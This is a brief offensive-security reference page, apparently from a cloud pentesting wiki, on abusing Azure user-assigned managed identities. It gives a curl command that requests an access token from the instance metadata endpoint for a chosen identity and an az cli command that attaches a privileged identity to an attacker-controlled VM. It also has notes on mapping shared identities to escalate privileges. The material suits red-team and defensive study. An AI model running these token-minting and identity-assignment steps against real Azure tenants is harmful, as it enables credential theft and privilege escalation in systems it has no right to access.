A user-assigned managed identity is a standalone resource that can be attached to many compute resources at once. That reuse is the attacker's gift: the same identity (and its RBAC) is reachable from every resource it is bound to, and it can be attached to a new resource you control.
Minting a user-assigned token#
# client_id selects which user-assigned identity on a multi-identity resource
curl -s -H Metadata:true \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/&client_id=<uami-client-id>"
Attaching it to a resource you hold#
az vm identity assign --name <vm-you-control> -g <rg> \
--identities /subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<uami>
# then mint its token on that VM
Exploitation notes#
- Enumerate which resources share a user-assigned identity (Resource Graph on
identity.userAssignedIdentities): compromising any one of them yields the identity, and the identity may be far more privileged than the host. - Attaching a privileged user-assigned identity to a resource you already control is the managed identity assignment escalation; this page is the token mechanics and the reuse angle.
- You need the identity's
client_idto select it on a resource that carries more than one.
Tools#
- az cli (
az identity list,az vm identity assign). - Resource Graph to map identity-to-resource bindings.
- BARK for the attack-path view.